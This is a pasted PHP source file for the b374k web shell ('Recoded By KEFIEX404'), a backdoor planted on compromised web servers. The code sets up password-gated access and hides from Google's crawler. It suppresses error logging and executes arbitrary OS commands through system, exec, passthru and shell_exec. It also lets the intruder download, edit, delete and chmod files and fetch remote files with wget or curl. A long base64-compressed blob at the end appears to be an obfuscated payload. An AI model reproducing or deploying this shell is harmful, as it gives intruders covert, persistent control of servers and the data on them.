· 7 years ago · Oct 10, 2018, 09:52 PM
1<?php
2
3/* (Web Shell b374k Recoded By KEFIEX404 IDBTE4M ") */
4$auth_pass = "3d7c545d2084b9dbb193669983a7bfea";
5$color = "#df5";
6$default_action = 'FilesMan';
7$default_use_ajax = true;
8$default_charset = 'Windows-1251';
9@define('SELF_PATH', __FILE__);
10@setcookie("inject", "active", time() + 3600 * 24 * 7);
11if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
12 header('HTTP/1.0 404 Not Found');
13
14}
15@session_start();
16@error_reporting(0);
17@ini_set('error_log',NULL);
18@ini_set('log_errors',0);
19@ini_set('max_execution_time',0);
20@ini_set('output_buffering',0);
21@ini_set('display_errors', 0);
22@set_time_limit(0);
23@set_magic_quotes_runtime(0);
24@define('VERSION', '2.1');
25if( get_magic_quotes_gpc() ) {
26 function stripslashes_array($array) {
27 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
28 }
29 $_POST = stripslashes_array($_POST);
30}
31function printLogin() {
32 ?>
33
34 <center>
35 <form method=post>
36 <input type=password name=pass>
37 </form></center>
38 <?php
39 exit;
40}
41if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
42 if( empty( $auth_pass ) ||
43 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
44 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
45 else
46 printLogin();
47
48@ini_set('log_errors',0);
49@ini_set('output_buffering',0);
50
51if(isset($_GET['dl']) && ($_GET['dl'] != "")){
52 $file = $_GET['dl'];
53 $filez = @file_get_contents($file);
54 header("Content-type: application/octet-stream");
55 header("Content-length: ".strlen($filez));
56 header("Content-disposition: attachment; filename=\"".basename($file)."\";");
57 echo $filez;
58 exit;
59}
60elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
61 $file = $_GET['dlgzip'];
62 $filez = gzencode(@file_get_contents($file));
63 header("Content-Type:application/x-gzip\n");
64 header("Content-length: ".strlen($filez));
65 header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
66 echo $filez;
67 exit;
68}
69// view image
70if(isset($_GET['img'])){
71 @ob_clean();
72 $d = magicboom($_GET['y']);
73 $f = $_GET['img'];
74 $inf = @getimagesize($d.$f);
75 $ext = explode($f,".");
76 $ext = $ext[count($ext)-1];
77 @header("Content-type: ".$inf["mime"]);
78 @header("Cache-control: public");
79 @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
80 @header("Cache-control: max-age=".(60*60*24*7));
81 @readfile($d.$f);
82 exit;
83}
84
85// server software
86$software = getenv("SERVER_SOFTWARE");
87// check safemode
88if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
89// uname -a
90$system = @php_uname();
91// mysql
92function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}}
93function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
94function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
95function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
96function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
97// check os
98if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
99else $win = FALSE;
100// change directory
101if(isset($_GET['y'])){
102 if(@is_dir($_GET['view'])){
103 $pwd = $_GET['view'];
104 @chdir($pwd);
105 }
106 else{
107 $pwd = $_GET['y'];
108 @chdir($pwd);
109 }
110}
111//hdd
112function convertByte($s) {
113if($s >= 1073741824)
114return sprintf('%1.2f',$s / 1073741824 ).' GB';
115elseif($s >= 1048576)
116return sprintf('%1.2f',$s / 1048576 ) .' MB';
117elseif($s >= 1024)
118return sprintf('%1.2f',$s / 1024 ) .' KB';
119else
120return $s .' B';
121}
122
123// username, id, shell prompt and working directory
124if(!$win){
125 if(!$user = rapih(exe("whoami"))) $user = "";
126 if(!$id = rapih(exe("id"))) $id = "";
127 $prompt = $user." \$ ";
128 $pwd = @getcwd().DIRECTORY_SEPARATOR;
129}
130else {
131 $user = @get_current_user();
132 $id = $user;
133 $prompt = $user." >";
134 $pwd = realpath(".")."\\";
135 // find drive letters
136 $v = explode("\\",$d);
137 $v = $v[0];
138 foreach (range("A","Z") as $letter)
139 {
140 $bool = @is_dir($letter.":\\");
141 if ($bool)
142 {
143 $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
144 if ($letter.":" != $v) {$letters .= $letter;}
145 else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
146 $letters .= " ]</a> ";
147 }
148 }
149}
150
151function testoracle() {
152 if (function_exists('ocilogon')) { return showstat("on"); }
153 else { return showstat("off"); }
154 }
155
156function testmssql() {
157 if (function_exists('mssql_connect')) { return showstat("on"); }
158 else { return showstat("off"); }
159 }
160
161 function showdisablefunctions() {
162 if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
163 else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
164 }
165
166if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
167else $posix = FALSE;
168// server ip
169$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
170// your ip ;-)
171$my_ip = $_SERVER['REMOTE_ADDR'];
172$admin_id=$_SERVER['SERVER_ADMIN'];
173$bindport = "13123";
174$bindport_pass = "b374k";
175
176// separate the working direcotory
177$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
178$pwdurl = "";
179for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
180 $pathz = "";
181 for($j = 0 ; $j <= $i ; $j++){
182 $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
183 }
184 $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
185}
186
187// rename file or folder
188if(isset($_POST['rename'])){
189 $old = $_POST['oldname'];
190 $new = $_POST['newname'];
191 @rename($pwd.$old,$pwd.$new);
192 $file = $pwd.$new;
193}
194if(isset($_POST['chmod'])){
195 $name = $_POST['name'];
196 $value = $_POST['newvalue'];
197if (strlen($value)==3){
198 $value = 0 . "" . $value;}
199 @chmod($pwd.$name,octdec($value));
200 $file = $pwd.$name;}
201
202if(isset($_POST['chmod_folder'])){
203 $name = $_POST['name'];
204 $value = $_POST['newvalue'];
205if (strlen($value)==3){
206 $value = 0 . "" . $value;}
207 @chmod($pwd.$name,octdec($value));
208 $file = $pwd.$name;}
209
210
211// print useful info
212$buff = "Software : <b>".$software."</b><br />";
213$buff .= "System OS : <b>".$system."</b><br />";
214if($id != "") $buff .= "ID : <b>".$id."</b><br />";
215$buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />";
216$buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your ip : <b>".$my_ip."</b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";
217$buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";
218if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />";
219else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
220$buff .= "Disabled Functions: ".showdisablefunctions()."<br />";
221$buff .= "MySQL: ".testmysql()." | MSSQL: ".testmssql()." | Oracle: ".testoracle()." | Perl: ".testperl()." | cURL: ".testcurl()." | WGet: ".testwget()."<br>";
222$buff .= "<font color=00ff00 ><b>".$letters." > ".$pwdurl."</b></font>";
223
224
225
226
227function rapih($text){
228 return trim(str_replace("<br />","",$text));
229}
230
231function magicboom($text){
232 if (!get_magic_quotes_gpc()) {
233 return $text;
234 }
235 return stripslashes($text);
236}
237
238function showdir($pwd,$prompt){
239 $fname = array();
240 $dname = array();
241 if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
242 else $posix = FALSE;
243 $user = "????:????";
244 if($dh = @scandir($pwd)){
245 foreach($dh as $file){
246 if(is_dir($file)){
247 $dname[] = $file;
248 }
249 elseif(is_file($file)){
250 $fname[] = $file;
251 }
252 }
253 }
254 else{
255 if($dh = @opendir($pwd)){
256 while($file = @readdir($dh)){
257 if(@is_dir($file)){
258 $dname[] = $file;
259 }
260 elseif(@is_file($file)){
261 $fname[] = $file;
262 }
263 }
264 @closedir($dh);
265 }
266 }
267
268
269 sort($fname);
270 sort($dname);
271 $path = @explode(DIRECTORY_SEPARATOR,$pwd);
272 $tree = @sizeof($path);
273 $parent = "";
274 $buff = "
275 <form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
276 <table class=\"explore\">
277 <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
278
279 ";
280 if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
281 else $parent = $pwd;
282
283 foreach($dname as $folder){
284 if($folder == ".") {
285 if(!$win && $posix){
286 $name=@posix_getpwuid(@fileowner($folder));
287 $group=@posix_getgrgid(@filegroup($folder));
288 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
289 }
290 else {
291 $owner = $user;
292 }
293 $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
294 <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
295 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
296
297 <a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
298 <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
299 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
300 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
301 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
302 </form></td>
303
304 </tr>
305
306 ";
307 }
308 elseif($folder == "..") {
309 if(!$win && $posix){
310 $name=@posix_getpwuid(@fileowner($folder));
311 $group=@posix_getgrgid(@filegroup($folder));
312 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
313 }
314 else {
315 $owner = $user;
316 }
317 $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'> $folder</a></td><td>LINK</td>
318 <td style=\"text-align:center;\">".$owner."</td>
319 <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
320
321 <td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
322 <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
323 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
324 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
325 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
326 </form>
327 </td></tr>";
328 }
329 else {
330 if(!$win && $posix){
331 $name=@posix_getpwuid(@fileowner($folder));
332 $group=@posix_getgrgid(@filegroup($folder));
333 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
334 }
335 else {
336 $owner = $user;
337 }
338 $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
339
340 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
341 <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
342 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
343 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
344 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
345 </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
346 <td><center>
347 <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
348
349 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
350 <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
351 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
352 <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
353 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
354 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
355 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">delete</a></td></tr>";
356 }
357 }
358
359 foreach($fname as $file){
360 $full = $pwd.$file;
361 if(!$win && $posix){
362 $name=@posix_getpwuid(@fileowner($folder));
363 $group=@posix_getgrgid(@filegroup($folder));
364 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
365 }
366 else {
367 $owner = $user;
368 }
369 $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
370
371 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
372 <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
373 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
374 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
375 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
376 </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
377 <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
378
379 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
380<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
381<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
382<input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
383<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
384 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
385 <td><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$full\">delete</a> | <a href=\"?y=$pwd&dl=$full\">download</a> (<a href=\"?y=$pwd&dlgzip=$full\">gzip</a>)</td></tr>";
386 }
387 $buff .= "</table>";
388 return $buff;
389}
390
391function ukuran($file){
392 if($size = @filesize($file)){
393 if($size <= 1024) return $size;
394 else{
395 if($size <= 1024*1024) {
396 $size = @round($size / 1024,2);;
397 return "$size kb";
398 }
399 else {
400 $size = @round($size / 1024 / 1024,2);
401 return "$size mb";
402 }
403 }
404 }
405 else return "???";
406}
407
408function exe($cmd){
409 if(function_exists('system')) {
410 @ob_start();
411 @system($cmd);
412 $buff = @ob_get_contents();
413 @ob_end_clean();
414 return $buff;
415 }
416 elseif(function_exists('exec')) {
417 @exec($cmd,$results);
418 $buff = "";
419 foreach($results as $result){
420 $buff .= $result;
421 }
422 return $buff;
423 }
424 elseif(function_exists('passthru')) {
425 @ob_start();
426 @passthru($cmd);
427 $buff = @ob_get_contents();
428 @ob_end_clean();
429 return $buff;
430 }
431 elseif(function_exists('shell_exec')){
432 $buff = @shell_exec($cmd);
433 return $buff;
434 }
435}
436
437function tulis($file,$text){
438 $textz = gzinflate(base64_decode($text));
439 if($filez = @fopen($file,"w"))
440 {
441 @fputs($filez,$textz);
442 @fclose($file);
443 }
444}
445
446function ambil($link,$file) {
447 if($fp = @fopen($link,"r")){
448 while(!feof($fp)) {
449 $cont.= @fread($fp,1024);
450 }
451 @fclose($fp);
452 $fp2 = @fopen($file,"w");
453 @fwrite($fp2,$cont);
454 @fclose($fp2);
455 }
456}
457
458function which($pr){
459 $path = exe("which $pr");
460 if(!empty($path)) { return trim($path); } else { return trim($pr); }
461}
462
463function download($cmd,$url){
464 $namafile = basename($url);
465 switch($cmd) {
466 case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
467 case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
468 case 'wfread' : ambil($wurl,$namafile);break;
469 case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
470 case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
471 case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
472 case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
473 default: break;
474 }
475 return $namafile;
476}
477
478function get_perms($file)
479{
480 if($mode=@fileperms($file)){
481 $perms='';
482 $perms .= ($mode & 00400) ? 'r' : '-';
483 $perms .= ($mode & 00200) ? 'w' : '-';
484 $perms .= ($mode & 00100) ? 'x' : '-';
485 $perms .= ($mode & 00040) ? 'r' : '-';
486 $perms .= ($mode & 00020) ? 'w' : '-';
487 $perms .= ($mode & 00010) ? 'x' : '-';
488 $perms .= ($mode & 00004) ? 'r' : '-';
489 $perms .= ($mode & 00002) ? 'w' : '-';
490 $perms .= ($mode & 00001) ? 'x' : '-';
491 return $perms;
492 }
493 else return "??????????";
494}
495
496function clearspace($text){
497 return str_replace(" ","_",$text);
498}
499function w($dir,$perm) {
500 if(!is_writable($dir)) {
501 return "<font color=red>".$perm."</font>";
502 } else {
503 return "<font color=lime>".$perm."</font>";
504 }
505}
506function r($dir,$perm) {
507 if(!is_readable($dir)) {
508 return "<font color=red>".$perm."</font>";
509 } else {
510 return "<font color=lime>".$perm."</font>";
511 }
512}
513
514
515$wpress="7VhZc+JIEn5uR/g/1FQTIdyDEZaPGGPDNA3CxsbgEfLZ08GUpAJkdI0kDHij//tmlQ7uNj0Psy+LDwWVX2Zl5V2ivu/6XZ96rh+aTj9b2Dvb3dnd0d1X6mdxwzHcR89yzRBH672Ro4em66CAvNJsxiAh2fvP7s6HD5meh0roc8/1qDPPlx+ENs4hTPAecn1kmDSLdeKEiAFRz7Qol/zhQ2/smyGI7Hk5FMmNlnXLDfgy+/59QQfijPSRb2UzAXAGsR764AAUYetd0zFDlMURmW/DlwMauh4QGDSHqndKs32rdhVZvVNaqlJpdeqykkMH7+Dr7Waz/dBsVytqo916H3/XkZXKhdxSwRg37ptpWUQ8zhdQ9sEEY40D1FLRSf7gDPmvxUMpX9hDF1QfuqJUOCjA7wGqmz7tuROREd87TLXdaslVVW3cyO072PH4HXyn0+zey0qj/nQrs8MXtsZftjvqKn5FnfZ1Q76qKDlBd4fU71puX9iGpd5oyss8PDgSF9MJ1SPlGMmn4ch3ovBh0bMYLpY76JsOgOkQQmxMNfg/Cqjvw9MjQRJAnhuEIJ74Pplm2Qp8MGyOUamMcMSBcwnBGxsxgYmYrfvUprZGfZtG5J7rU0ipGWDs7QcjzYbM4vSm20cNZ57fAH/rYTd0Y/mgsAhMxLBNR5wBIbRD3XWHZrzRQUrixtIHy9kAx18bPj+ZCj+ZCf9mIvxkXG8f1kvwWw5657gMVG/IzVqHhRnE1pq4//lM2TpRTlYyZTlRTlYzJar+GTOt4jw1qD5wET7XqRNSv3zec6GKB+YbLQnH3kQoo6pPSUgN9GVaRHO85yJDls81v4zPUCpnQALTQpoZEGgKljkgITzROUED8G5JWOwgAgrCqQU7hXQS7htUd33CNC0ix3WoUF5En4ukfC4memqzP7zaQmzNtK7BClnIX5/Y4KMhfDuInxI/uNnLBqEPvlsC7aFSqYTqlWZH3kOxSfm3s81M0g+ZMkFIfFZ9Nuz3KyNY0GHjBc5DHWMDhwRPLjECxrsBdqQBfIblGHgySfvzLEmcRM/EehBarACz5t3t07Crg3/B2EFWEGmoi6wQjg0eggg+nk/7XZuE+qBLLAsw2fyn3/eKk6IowJZkrtszNKuTRB9Eo8XXg2+IBFGVZp7IaERfvzMWB65NRY4UvZFmmXoXIsFiFRNAPbOf9wYerxYQgkj8hIKpbZnOEPThnEKe8+aFzdxCLobso3gxnIRwTIQ+icwo4HGu4C8ljHncsEXYKaOByn/pHtqkI+QKnbAdopPuR99B+F9nsegMOzGba6L+sz/bn4U0DEcSswqfvSJoDo/5YXveCKzDADmuWzTFcQwf11YMGbFHsN0dnqrRqfF+GeJmGNAgySTeZDKDuF2yRBryRGIScrj2pcuKKPhYwDksxFMe42DiHGLTDVysP6zh4lHl+sYGrttKp/PQVmprOA1tA0+rciOvxUPI9szJOq6QaGCxmA6AdWfrasQfMV8NAUUneOUIKeCFOFCy5wDJvqBDHsNPqkseM8nBDBqM6HocNAgobMHirgC1jeMsXlRhTm/H1IdMo8tK9VquoS9P6Bp6ivyIGrUvqnx0A5VbFO0RuBoKtz6kBk7DA39ENQ1dQhhA2WfRkMTHHJUpX0Sp59cgbmPFiijVcQ2KMRfZqZdpKvfLLbcBB0TmSGC7O/Y0+NtiYe7AUJXleuZSfXLpnlHgo/gTMQXUYoOYoUFR0iIAWCwktmdapQjy94j60yzuyE2YutEnVFfaNyhxJ0SlrDCTNmqo0qniuNSBDD9m71FeHfnEGQtO6iH7ZEwW9Rn/a6P2bUG/GCv9UAsWKakKUXR0QeCSJtJmVaQFXaA3QMHg+khfY3GvxBrRb3MolPglhid+SMjzh0ALyt/d1iqqnNquI6s8eLrMQSWB+0nI8RUYc0wHltKUE9DDpazIYGZYNQ0hvrLy6x+rnJEqrKZzVt4QzmK6tAiIhuxwAEM8VGPoh5bF4L+PYMYgBudifSi5UTAJueSs8a2Cq5RDixnHxzJtiVPamhUyNeq+zkharE5aDrNALv2Ju2MPZiKd/okRdwssQY2Cb2KZGyTxTAizooOgqHNps0QB8dEpD2EHjQT05KjLBi4DLu63Fy1LcxRLfzlqVV8m7o16fKXIV3eKqrQa8nH9fnjfacjKlaKOX0lN/rX2h/tbU5rnGYv6xWAM68POnVK9l+8Kaqdy2rh49rSL+96zdF94lFqvDA9/b9dVwzUulXHb/O1Vv6i/GRf3Jnk4Gj1Jp2Hz8GpgTE89arWO1ZebI9XUvfa4cP38+DzQqoM34/Kqp9unhRv1xn0+9DzNfg6eHhXr+rJV0K3TqXb4x+RmOjCfHltW60XpPV/cv2gS0Kv9Od2G3jX7U4NWtV+4vn07KiVRNR6PWcE0oQIngdTzjmdtGOgrTfg4l9g2FqKvHWYy4yTj2H9+aZBWbqSJn+PbIXPi7FIIRBgtQq8LWUR9uHZy0BaRPbtWMsSb6UWcn5NjpvSYdz+SNH+TbUQU1HLH711FlxNu5MHUR7k+hM/npUitaJf/31r/h7dW6d+9th6uvbYCEaociadXPKbjudybG4ET0LopmE06sawpcLCAy+InDsvY6YKNkxEYtj6Zj9uFsI1TVozCNBAzUzFji0myrDHAybIfQn9E38fFrtjdiWqAwA53KJTK+HN6Vrz3YzHvpccSfM4/CKcOiszE4kGhwcgK573EBaRC49e28RLrWQFa7LE/th1vlMH68kgCXh/hvjW7W2bxx3hU/RiYGC47wR67g6ENn6QLRm8xdNdy/ZLQ9yl1hPK2Oi682Ni41XrC9/XL1Aroz2rtU0Mo90mfWMimHg3y+fx2mqXidFcjiLwQZEMXIVYRbcu4bqTaljeZvYtzM8+2vN7qZSHln3/X88+cAo/YD/GrKq4gOi9BS1t4i8R+vv8X";
